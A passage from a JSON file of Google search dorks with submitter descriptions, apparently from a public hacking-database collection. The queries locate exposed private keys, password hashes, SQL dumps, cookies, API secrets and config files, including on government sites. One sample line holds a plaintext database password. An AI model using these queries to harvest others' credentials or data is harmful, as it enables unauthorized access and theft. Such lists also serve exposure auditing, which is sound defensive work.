Chitkara"}, {"dork": "intitle:\"index of \" \"users.json\"", "description": "AUTHOR: ABHIJITH A\r\nDESCRIPTION : intitle:\"index of \" \"users.json\"\r\nInformation about user data is obtained"}, {"dork": "intitle:\"index of\" \"userdata.json\"", "description": "Dork: intitle:\"index of\" \"userdata.json\"\r\nDescription: This google dork lists out websites with sensitive user data\r\njson files.\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"W E L C O M E to R O O T\" ext:cfg OR ext:log OR ext:txt", "description": "# Google Dork: intext:\"W E L C O M E to R O O T\" ext:cfg OR ext:log OR ext:txt\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 20/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.log\"", "description": "Dork: intitle:\"index of\" \"db.log\"\r\nDescription: This google dork lists out sensitive database logs for web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"properties.ini\"", "description": "Dork: intitle:\"index of\" \"properties.ini\"\r\nDescription: This google dork lists out sensitive properties of a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "ext:sql intext:\"-- phpMyAdmin SQL Dump", "description": "Google Dorks : ext:sql intext:\"-- phpMyAdmin SQL Dump\r\nDescription : Various page containing SQL Dump Page .\r\nAuthor : Anjali Prakash ."}, {"dork": "intitle:\"index of\" \"var/log/\"", "description": "Google Dork: intitle:\"index of\" \"var/log/\"\r\nDate: 2020-05-30\r\nExploit Author: Apurva Badave\r\nDescription: This Google dork shows juicy information about different logs used by\r\nthe website. Logs like connector.log, debug log,system.log, exception.log, etc\r\n\r\nThanks,\r\nApurva Badave"}, {"dork": "intitle:index of config.asp", "description": "Dork: intitle:index of config.asp\r\n\r\nDescription: This search brings up sites with \"config.asp\" files. this\r\nconfiguration file contains both a username and a password for an SQL\r\ndatabase.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "intitle:\"index of\" \"security.php\"", "description": "Dork: intitle:\"index of\" \"security.php\"\r\n\r\nDescription: This google dork lists out sensitive security logs in web\r\nservers.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "index.of:\"pcap\" -site:stackoverflow.com -site:github.com", "description": "Dork:\r\nindex.of:\"pcap\" -site:stackoverflow.com -site:github.com\r\n\r\nDescription:\r\nThis dork queries google and finds the Wireshark PCAP files within open directories.\r\n\r\nCategory:\r\nFiles Containing Juicy Info.\r\n\r\nAuthor:\r\nJadeWolf"}, {"dork": "intitle:\"index of\" \".config\"", "description": "Dork: intitle:\"index of\" \".config\"\r\nDescription: This google dorks lists out config folders on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:.drone.yml intext:git config user.email", "description": "Google Dork: inurl:.drone.yml intext:git config user.email\r\nAuthor: Rajat Sharma\r\nDate: 2020-06-04"}, {"dork": "intitle:\"index of\" \"adminsubscribeack.txt\"", "description": "Dork: intitle:\"index of\" \"adminsubscribeack.txt\"\r\nDescription: This google dorks lists out sensitive admin subscription data\r\non web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"log.bak\"", "description": "Dork: intitle:\"index of\" \"log.bak\"\r\nDescription: This google dorks lists out sensitive backup log files web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"ReportServer/Pages/ReportViewer.aspx\"", "description": "# Google Dork: inurl:\"ReportServer/Pages/ReportViewer.aspx\"\r\n# Description: Various page containing Report viewer\r\n# Author : Anjali Prakash\r\n# Date: 2020-06-04"}, {"dork": "intitle:\"index of\" \"database/config\"", "description": "# Dock : intitle:\"index of\" \"database/config\"\r\n# Description: This dork will find some juicy information about database configuration files - database/config\r\n\r\nAuthor : Ravi Pavan"}, {"dork": "intitle:\"index of\" \"auth_config.php\"", "description": "Dork: intitle:\"index of\" \"auth_config.php\"\r\nDescription: This google dorks lists out authentication config files on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"aws-config.php\"", "description": "Dork: intitle:\"index of\" \"aws-config.php\"\r\nDescription: This google dorks lists out aws config files on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"auth.config\"", "description": "Dork: intitle:\"index of\" \"auth.config\"\r\nDescription: This google dorks lists out authentication config files on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"index of\" \"sshd_config\"", "description": "# Google Dork: \"index of\" \"sshd_config\"\r\n# Title: Configuration files disclosure.\r\n# Date: 04/06/2020\r\n# Author: Bhaskar Kumar"}, {"dork": "\"index of\" /ftp/logs", "description": "# Title: Finding potential log files.\r\n# Google Dork: \"index of\" /ftp/logs\r\n# Date: 04/06/2020\r\n# Author: Ritik Sahni"}, {"dork": "\"index of\" /private/logs", "description": "# Google Dork: \"index of\" /private/logs\r\n# Title: Finding potential log files.\r\n# Date: 04/06/2020\r\n# Author: Ritik Sahni"}, {"dork": "allinurl:index.php?db=information_schema", "description": "Google Dork : allinurl:index.php?db=information_schema\r\n\r\nDescription :\r\n\r\nThis dork bypasses the admin username and password and takes you directly\r\nto information schema table and you can delete data!\r\n\r\nAuthor : Anjali\r\n\r\nLinkedin Profile link : https://www.linkedin.com/in/anjali-p-44ab20133/"}, {"dork": "filetype:sql intext: \"sql dump\"", "description": "filetype:sql intext: \"sql dump\"\r\n\r\nSensitive Sql dump files in various domains"}, {"dork": "\"index of\" \"user.sqlite\"", "description": "# Google Dork: \"index of\" \"user.sqlite\"\r\n# Title: SQLite files disclosure.\r\n# Date: 04/06/2020\r\n\r\n# Author: Shivani Kumari\r\n# LinkedIn: https://www.linkedin.com/in/shivani1337/\r\n# Twitter: https://twitter.com/Shivani1337\r\n# GitHub: https://github.com/Shivani1337\r\n# Bugcrowd: https://bugcrowd.com/Shivani1337\r\n\r\n_\r\nThank you,\r\nShivani Kumari"}, {"dork": "intitle:\"index of\" \"wp-admin.zip\"", "description": "*Dork:* intitle:\"index of\" \"wp-admin.zip\"\r\n*Description:* This Google dork can be used to discover publicly available\r\nZIP files containing wp-admin.php file which has sensitive WordPress\r\nInformation.\r\n*Author:* Hemant Patidar (HemantSolo)\r\n*Linkedin: *https://www.linkedin.com/in/hemantsolo/"}, {"dork": "DORK : intext:\"index of\" \"var/log/\"", "description": "Dork : intext:\"index of\" \"var/log/\"\r\n\r\nDescription: This Google dork shows juicy information about different logs\r\nused by the website. Logs like connector.log, debug log,system.log,\r\nexception.log, etc\r\n\r\nThanks and regards\r\nAnil Tom"}, {"dork": "\"microsoft internet information services\" ext:log", "description": "Files containing juicy info:\r\n\r\n\"microsoft internet information services\" ext:log\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "index of \"backup.zip\"", "description": "Google Dork: index of \"backup.zip\"\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/"}, {"dork": "inurl:admin intitle:index of ext:sql | xls | xml | json | csv", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: inurl:admin intitle:index of ext:sql | xls | xml | json | csv\r\n# Date: 2020-06-06\r\n\r\n# Author: Bhaskar Kumar\r\n# LinkedIn: https://www.linkedin.com/in/haxonic/\r\n\r\n_\r\nRegards,\r\nTeam HAXONIC"}, {"dork": "\"phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"", "description": "# Dork: \"phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"\r\n\r\nThank you\r\nAshish More"}, {"dork": "\"root.log\" ext:log", "description": "# Google Dork: \"root.log\" ext:log\r\n# Juicy information and sensitive directories.\r\n# Date: 2020-06-09\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"dev/config\"", "description": "Dork: intitle:\"index of\" \"dev/config\"\r\nCategory: Files Containing Juicy Info\r\nInfo: This Google Dork lists out config folders/files on web servers\r\n\r\nExploit Author: Mayank Raheja\r\n\r\nThanks! Looking forward to your response.\r\nRegards,\r\nMayank Raheja"}, {"dork": "index of \"logs.zip\"", "description": "# Dork:- index of \"logs.zip\"\r\n# Impact:- Files Containing Juicy Info\r\n\r\nThank you\r\n\r\n\r\n\r\n\r\n\r\n\r\nAuthor:- Shivansh Kumar\r\nIndependent security researcher\r\nIndia"}, {"dork": "index of \"dbbackup\"", "description": "Dork: index of \"dbbackup\"\r\nCategory: Files Containing Juicy Info\r\nInfo: This Google Dork lists out backup folders/files on web servers\r\n\r\nExploit Author: Mayank Raheja\r\n\r\nThanks! Looking forward to your response.\r\nRegards,\r\nMayank Raheja"}, {"dork": "intitle:\"index of /\" \"nginx.conf\"", "description": "intitle:\"index of /\" \"nginx.conf\"\r\n\r\nBY\r\n\r\nSagar Banwa"}, {"dork": "\"Index of\" \"customer.php\"", "description": "Google Dork: \"Index of\" \"customer.php\"\r\n\r\nCategory: Files Containing Juicy Info\r\n\r\nAuthor: Prashant Sharma\r\n\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intitle:index.of.?.db", "description": "Dor: intitle:index.of.?.db\r\nDescription: Used to find database of different websites\r\n\r\n-- \r\nWith Regards,\r\nAkhil G Krishnan"}, {"dork": "\"index of sqlite\"", "description": "# Google Dork: \"index of sqlite\"\r\n# Title: SQLITE file disclosure\r\n# Date: 06/06/2020\r\n# Author: Mahesh Rai\r\n# LinkedIn: https://www.linkedin.com/in/mahesh-rai\r\n# Bugcrowd: https://bugcrowd.com/Mahesh_Rai"}, {"dork": "intext:\"index of /\" \"config.json\"", "description": "Google Dork: intext:\"index of /\" \"config.json\"\r\nDork Title: Files Containing Juicy Info\r\nDork Author: Abinesh kamal K U"}, {"dork": "index of .svn/text-base/index.php.svn-base", "description": "Dork: index of .svn/text-base/index.php.svn-base"}, {"dork": "intitle:\"index of\" admin.tar", "description": "Dork: intitle:\"index of\" admin.tar\r\nDescription: This google dorks lists out default admin folders on web\r\nservers\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"index of /\" \"*.yaml\"", "description": "Google Dork: intext:\"index of /\" \"*.yaml\"\r\nDork Title: Files Containing Juicy Info\r\nDork Author: Abinesh kamal K U\r\n\r\n\r\n-- \r\nAbinesh Kamal K U"}, {"dork": "\"index of\" \"siri\"", "description": "Google Dork: \"index of\" \"siri\"\r\nCategory: Files Containing Juicy Info\r\nAuthor: Prashant Sharma\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intitle:\"index of\" secrets.yml", "description": "Dork: intitle:\"index of\" secrets.yml\r\nDate: 2020-06-15\r\n\r\nby\r\n\r\nkrushna Lipane"}, {"dork": "intitle:\"index of /\" \"*key.pem\"", "description": "# Dork :intitle:\"index of /\" \"*key.pem\"\r\n# Sensitive informations : Private Keys\r\n# Author : Ambadi MP"}, {"dork": "index of /backend/prod/config", "description": "Dork: index of /backend/prod/config\r\nDescription : Files Containing Juicy Info\r\nAuthor : Rahul Parmar"}, {"dork": "\"Index of\" \"/access\"", "description": "Google Dork: \"Index of\" \"/access\"\r\nCategory: Files containing Juicy Info\r\nAuthor: Prashant Sharma\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intext:\"Not to be distributed\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx", "description": "# Google Dork: intext:\"Not to be distributed\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx\r\n# Sensitive stuff.\r\n# Date: 17/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "Index of /__MACOSX/System", "description": "# Dork: Index of /__MACOSX/System\r\n# Name: Deepak Kumar Bharti\r\n# Description: Will show some juicy information related to Parent directory\r\n# and details."}, {"dork": "intitle:\"index of\" \"id_rsa.pub\"", "description": "# Dork: intitle:\"index of\" \"id_rsa.pub\"\r\n# Author: Sid Joshi\r\n# Result of this dorks contains Sensitive Directories with juicy ssh keys.\r\n\r\n# POC in attachment\r\n\r\n# Thanks!"}, {"dork": "intitle:\"index of\" /etc/openvpn/", "description": "# Google Dork: intitle:\"index of\" /etc/openvpn/\r\n# Juicy information and sensitive directories.\r\n# Date: 26/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"*named.root.key\"", "description": "# Google Dork: intitle:\"index of\" \"*named.root.key\"\r\n# Juicy information and sensitive directories.\r\n# Date: 26/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" ./bash_history", "description": "# Google Dork: intitle:\"index of\" ./bash_history\r\n# Juicy info and sensitive directories.\r\n# Date: 30/06/2020\r\n# Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN RSA PRIVATE KEY-----\" inurl:id_rsa", "description": "Dork: \"-----BEGIN RSA PRIVATE KEY-----\" inurl:id_rsa\r\nDescription: Some hashes (passwords, certs, etc.)\r\nAuthor: Sandeep Kumar"}, {"dork": "\"Index of\" \"accounts.sql\"", "description": "Title: Containing juicy info\r\nGoogle Dork: \"Index of\" \"accounts.sql\"\r\nDate: 28/06/2020\r\nAuthor : Mohit khemchandani"}, {"dork": "intitle:\"index of\" \"bundle.pem\"", "description": "# Google Dork: intitle:\"index of\" \"bundle.pem\"\r\n# Juicy information and sensitive directories.\r\n# Date: 26/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of /\" \"joomla/database\"", "description": "Dork: intitle:\"Index of /\" \"joomla/database\"\r\n\r\nThis google dork gives us about joomla related database files and source\r\ncode related to websites running joomla it will also expose directory\r\nlisting of websites\r\n\r\nThanks\r\nNaveenKumar"}, {"dork": "intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" | \"netsparker\" | \"nmap\") filetype:html", "description": "Description : intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" |\r\n\"netsparker\" | \"nmap\") filetype:html\r\n\r\nThis dork allows identification and detection of\r\nvulnerabilities arising from mis-configurations or flawed programming\r\nwithin a network-based asset such as a firewall, router, web server,\r\napplication server, etc from already scanned reports.\r\n\r\n*This html version is giving more reports of top companies than the PDF\r\nversion. please find the screenshots and compare with the pdf version.*\r\n\r\nThanks,\r\nSachin"}, {"dork": "intitle:\"report\" (\"OpenVAS\" | \"Nikto\") ext:pdf OR ext:html", "description": "# Google Dork: intitle:\"report\" (\"OpenVAS\" | \"Nikto\") ext:pdf OR ext:html\r\n# OpenVAS and Nikto vulnerability reports.\r\n# Date: 8/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"report\" (\"Fortify\" | \"Web Inspect\") filetype:pdf", "description": "# Google Dork: intitle:\"report\" (\"Fortify\" | \"Web Inspect\") filetype:pdf\r\n# Date: 08-07-2020\r\n\r\n#Description: This Google Dork allows retrieving reports of scanned\r\nsites thereby identifying vulnerabilities and misconfigurations\r\npresent in an application/website.\r\n# Exploit Author: S Suhas"}, {"dork": "intitle:\"index of\" exception.log", "description": "Description : intitle:\"index of\" system.log\r\n\r\nThe Google dork of intitle:\"index of\" system.log gives juicy information of\r\nhtdocs present in the respective url."}, {"dork": "allintext:username,password filetype:log", "description": "allintext:username,password filetype:log"}, {"dork": "intext:ISUR_MACHINE IIS -log", "description": "Dork: intext:ISUR_MACHINE IIS -log\r\nDescription: Error messages \r\nAuthor: Priyanka Prasad"}, {"dork": "intitle:\"index of\" jboss-service.xml", "description": "Description : intitle:\"index of\" jboss-service.xml\r\n\r\nThe Google dork of intitle:\"intitle:\"index of\" jboss-service.xml gives\r\njuicy information of JBoss Application Server\r\n\r\nAuthor:- Anurag Kumar"}, {"dork": "\"Reflector Dashboard\" inurl:/db/index.php/", "description": "# Google Dork: \"Reflector Dashboard\" inurl:/db/index.php/\r\n\r\n# Juicy info about Radio Amateur Dashboards.\r\n\r\n# Date: 28/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:\"API_SECRET*\" ext:env | ext:yml", "description": "# Google Dork: allintext:\"API_SECRET*\" ext:env | ext:yml\r\n# Juicy info.\r\n# Date: 10/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"user.MYD\"", "description": "# Google Dork: \"index of\" \"user.MYD\"\r\n# Title: Disclosure of sensitive files.\r\n# Date: 15/08/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n# Twitter: https://twitter.com/Sahil_delinitor\r\n# GitHub: https://github.com/Sahil-69\r\n# Bugcrowd: https://bugcrowd.com/Prickn\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "ext:log intext:NetworkManager \"systemd\"", "description": "Google Dork: ext:log intext:NetworkManager \"systemd\"\r\nBy using this dork one can list the indexed log files present on the\r\ninternet. This dork basically fetches either juicy information from the\r\nlogs or if lucky whole log files.\r\n\r\nPlease review my submission towards GHDB. I look forward to your response.\r\n\r\nRegards!\r\nMayank Sharma"}, {"dork": "intext:admin ext:sql inurl:admin", "description": "*Google Dork:* intext:admin ext:sql inurl:admin\r\n\r\n*Description:*With the extension sql and intext admin and inurl admin, I\r\nwas able to look into some of the admin sql files and even sql queries\r\ndirectly that reveals lots of sensitive information like login id, password\r\nin clear text. .\r\n\r\n*Author:* Anshul T\r\n\r\nThanks,\r\nAnshul T"}, {"dork": "site:ftp://ftp.*.* ext:sql", "description": "Dork: site:ftp://ftp.*.* ext:sql\r\nFiles containing Juicy info:\r\n\r\nsite:ftp://ftp.*.* ext:sql\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "\"index of\" \"callback.php\"", "description": "Google Dork: \"index of\" \"callback.php\"\r\nCategory: Files Containing Juicy Info\r\nAuthor: Prashant Sharma (@Prashantique)\r\nLinkedIn: https://www.linkedin.com/in/prashantique"}, {"dork": "intitle:\"index of\" \"composer.lock\"", "description": "Description : intitle:\"index of\" \"composer.lock\"\r\n\r\nThis google dork gives us the composer.lock file and sensitive details\r\nof misconfigured servers."}, {"dork": "'AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini", "description": "# Google Dork: 'AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini\r\n# MySQL database usernames and passwords, and SALT values....\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin", "description": "Dorks: Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin\r\n\r\nSummary:\r\nA Google dork that gives the PHPMyAdmin creates table information\r\nconfigutation.\r\n\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "intitle:\"index of\" \"phpmyadmin.sql\"", "description": "Files containing Juicy info:\r\n\r\nintitle:\"index of\" \"phpmyadmin.sql\"\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"config.db\"", "description": "Dork: intitle:\"index of\" \"config.db\"\r\n\r\nShow files containing juicy info"}, {"dork": "\"putty.log\" ext:log | ext:cfg | ext:txt", "description": "# Google Dork: \"putty.log\" ext:log | ext:cfg | ext:txt\r\n# Putty logs containing juicy info.\r\n# Date: 18/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"mysql.log\" | \"mysql.logs\"", "description": "# Google Dork: intitle:\"index of\" \"mysql.log\" | \"mysql.logs\"\r\n# Files containing juicy info.\r\n# Date: 24/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Environment Variables\" inurl:/cgi-bin/", "description": "Google Dork: intitle:\"Environment Variables\" inurl:/cgi-bin/\r\n\r\nDescription: This Google Dork is used for listing \"Environment Variables\"\r\nscript which is a CGI script that lists sensitive information such as the\r\npath names, server names, port numbers, server software, version numbers,\r\nadministrator email addresses etc all these juicy information can be\r\nobtained.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "\"UV9 Error (1.0)\"", "description": "Find error pages referring to the E-Vision Web-app. Can sometimes\r\ncontain juicy information.\r\n\r\n- Strontium"}, {"dork": "allintext:\"index of\" \"oauth-private.key\"", "description": "Dear Team,\r\n\r\n# Exploit Title: allintext:\"index of\" \"oauth-private.key\"\r\n# Google Dork: allintext:\"index of\" \"oauth-private.key\"\r\n# Exposed Oauth Private Keys\r\n# Date: 14/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\nPlease find the attached txt file.\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "intitle:\"PowerMTA\" inurl:logs", "description": "Files Containing Juicy Info\r\n\r\n# Google Dork: intitle:\"PowerMTA\" inurl:logs\r\n# Date: 10/15/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*"}, {"dork": "\"index of\" \"/home/000~ROOT~000/etc\"", "description": "Google Dork: \"index of\" \"/home/000~ROOT~000/etc\"\r\n\r\nDescription: Juicy Information and Sensitive Directories.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "allintext:\"Index Of\" \"cookies.txt\"", "description": "# Exploit Title: *allintext:\"Index Of\" \"cookies.txt\"*\r\n# Google Dork: *allintext:\"Index Of\" \"cookies.txt\"*\r\n# Juicy information : Valuable cookie information.\r\n# Date: 25/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "ext:txt | ext:log | ext:cfg | ext:yml \"administrator:500:\"", "description": "# Google Dork: ext:txt | ext:log | ext:cfg | ext:yml \"administrator:500:\"\r\n\r\n# Various Windows SAM hashed Administrator hashes...\r\n\r\n# Date: 24/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/xampp/htdocs\" | \"C:/xampp/htdocs/\"", "description": "# Google Dork: intitle:\"index of\" \"/xampp/htdocs\" | \"C:/xampp/htdocs/\"\r\n# Sensitive directories.\r\n# Date: 10/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"* Authentication Unique Keys and Salts\" ext:txt | ext:log", "description": "# Google Dork: \"* Authentication Unique Keys and Salts\" ext:txt | ext:log\r\n\r\n# Authentication Unique Keys and Salts and more....\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Server version\" \"-- MySQL Administrator dump 1.4\" ext:sql", "description": "# Google Dork: \"-- Server version\" \"-- MySQL Administrator dump 1.4\" ext:sql\r\n\r\n# Files Containing Juicy Info. MySQL dumps, sometimes containing usernames,\r\npasswords and other stuff\r\n\r\n# Date: 27/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*gov.* intitle:index.of db", "description": "# Title: Database Disclosure for specific domain\r\n# Google Dork: site:*gov.* intitle:index.of db\r\n# Date: 1/10/2020\r\n# Author: Prajwal Khante"}, {"dork": "intitle:\"index of\" \"service-Account-Credentials.json\" | \"creds.json\"", "description": "# Google Dork: intitle:\"index of\" \"service-Account-Credentials.json\" | \"creds.json\"\r\n# Sensitive directories containing private keys, private key IDs, etc..\r\n# Date: 5/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/.idea\"", "description": "# Google Dork: intitle:\"index of\" \"/.idea\"\r\n# Sensitive directories containing juicy info and sometimes usernames and passwords.\r\n# Date: 27/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" intext:credentials", "description": "#Google Dork: intitle:\"index of\" intext:credentials\r\n#Files Containing Juicy Info\r\n#Author: Mohammed Saneem"}, {"dork": "Index of /_vti_pvt +\"*.pwd\"", "description": "# Google Dork: Index of /_vti_pvt +\"*.pwd\"\r\n# Sensitive directories containing juicy information and usernames and passwords.\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:gov ext:sql | ext:dbf | ext:mdb", "description": "# Google Dork: site:gov ext:sql | ext:dbf | ext:mdb\r\n# sensitive uploaded contents from websites\r\n# Author : ANURAG K P"}, {"dork": "intitle:\"index of\" \"Clientaccesspolicy.xml\"", "description": "Files containing Juicy info:\r\n\r\nintitle:\"index of\" \"Clientaccesspolicy.xml\"\r\n\r\n\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "\"secret_key_base:\" ext:exs | ext:txt | ext:env | ext:cfg", "description": "# Google Dork: \"secret_key_base:\" ext:exs | ext:txt | ext:env | ext:cfg\r\n# Sensitive directories containing juicy information.\r\n# Date: 12/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:sql | ext:txt intext:\"-- phpMyAdmin SQL Dump --\" + intext:\"admin\"", "description": "# Google Dork: ext:sql | ext:txt intext:\"-- phpMyAdmin SQL Dump --\" + intext:\"admin\"\r\n# Files containing juicy info...\r\n# Date: 19/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"putty.log\" ext:log | ext:cfg | ext:txt | ext:sql | ext:env", "description": "#Exploit Title : Putty logs containing juicy info.\r\n#Google Dork : \"putty.log\" ext:log | ext:cfg | ext:txt | ext:sql | ext:env\r\n#Date : 18/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "ext:php intitle:phpinfo \"published by the PHP Group\"", "description": "#Google Dork: ext:php intitle:phpinfo \"published by the PHP Group\"\r\n# sensitive login page with extension like spl,dbf,mdb\r\n# Author : ANURAG K P"}, {"dork": "intitle:\"index of\" intext:\"web.xml\"", "description": "# Dork: intitle:\"index of\" intext:\"web.xml\"\r\n# This dork looks for a directory listing that contains web.xml. The file is a deployment descriptor that defines mappings between URLs and servlets.\r\n# For more information on web.xml:\r\n# https://docs.oracle.com/cd/E24329_01/web.1211/e21049/web_xml.htm#WBAPP502\r\n# It can be leveraged to identify additional pages/URIs on a webserver. A use case for example is on Apache Tomcat.\r\n\r\nCategory: Files Containing Juicy Info\r\nSubmitted by stmxcsr"}, {"dork": "ext:txt | ext:log | ext:cfg \"Building configuration...\"", "description": "# Google Dork: ext:txt | ext:log | ext:cfg \"Building configuration...\"\r\n# Cisco configuration files containing juicy information and many times passwords.\r\n# Date: 20/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:yml | ext:txt | ext:env \"Database Connection Information Database server =\"", "description": "# Google Dork: ext:yml | ext:txt | ext:env \"Database Connection Information\r\nDatabase server =\"\r\n\r\n# Files containing juicy information.\r\n\r\n# Date: 3/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"The SQL command completed successfully.\" ext:txt | ext:log", "description": "# Google Dork: \"The SQL command completed successfully.\" ext:txt | ext:log\r\n\r\n# Files containing juicy information.\r\n\r\n# Date: 3/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/php/info.php\" \"PHP Version\"", "description": "# Google Dork: inurl:\"/php/info.php\" \"PHP Version\"\r\n\r\n# Pages containing juicy info.\r\n\r\n# Date: 16/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:ftp.*.*.* \"ComputerName=\" + \"[Unattended] UnattendMode\"", "description": "# Google Dork: site:ftp.*.*.* \"ComputerName=\" + \"[Unattended] UnattendMode\"\r\n# Files containing juicy info.\r\n# Date: 24/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:@gmail.com filetype:log", "description": "# Author: - Rushabh Doshi (https://www.linkedin.com/in/rushabh1998)\r\n# Category: - juicy information\r\n# Description: - This dork returns the logs which contains sensitive information like email addresses, timestamp and passwords\r\n# Google Dork: - allintext:@gmail.com filetype:log\r\n# Date: - 26/12/2020"}, {"dork": "inurl:https://trello.com AND intext:@gmail.com AND intext:password", "description": "# Author: - Rushabh Doshi\r\n# Category: - juicy information\r\n# Description: - This dork returns the vulnerable firebase database links which contains sensitive information like email addresses or other details about android app using firebase as a database\r\n# Google Dork: - inurl:https://trello.com AND intext:@gmail.com AND intext:password\r\n# Date: - 21/12/2020\r\n\r\nThanks & Regards"}, {"dork": "intitle:\"index of\" intext:\"apikey.txt", "description": "#Google Dork intitle:\"index of\" intext:\"apikey.txt\" \r\n#Files Containing Juicy info\r\n#Author Mohammed Saneem"}, {"dork": "filetype:log inurl:paypal", "description": "# Author: - Hank Fordham\r\n# Category: - juicy information\r\n# Description: - This dork returns the logs which contains sensitive information like email addresses, timestamp etc.\r\n# Google Dork: - filetype:log inurl:paypal\r\n# Date: - 01/18/2021"}, {"dork": "intitle:final.attendee.list | inurl:final.attendee.list", "description": "# Google Dork: intitle:final.attendee.list | inurl:final.attendee.list\r\n\r\n# Juicy info.\r\n\r\n# Date: 18/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:xlsx inurl:database", "description": "# Google Dork: ext:xlsx inurl:database\r\n# Date: 15/01/2021\r\n# Information of database with .xlsv extension\r\n\r\n# Author:Raj Zamal"}, {"dork": "ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential", "description": "Dork: ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential\r\n\r\nCategory : Files Containing Juicy Info\r\nAuthor: Naved Shaikh"}, {"dork": "intitle:\"index of\" \"application.properties\"", "description": "*Google Dork: intitle:\"index of\" \"application.properties\"*\r\n*Exploit Author: Parth Shukla*\r\n\r\n*Example: *\r\nspring.mvc.view.prefix=/WEB-INF/views/spring.mvc.view.suffix=.jspspring.datasource.url=jdbc:mysql://localhost:3306/componente_c?allowPublicKeyRetrieval=true&useSSL=falsespring.datasource.username=rootspring.datasource.password=KG3fi57HsauW9#\r\n\r\nThank you,\r\nParth Shukla"}, {"dork": "inurl:\"dcwp_twitter.php\"", "description": "Google 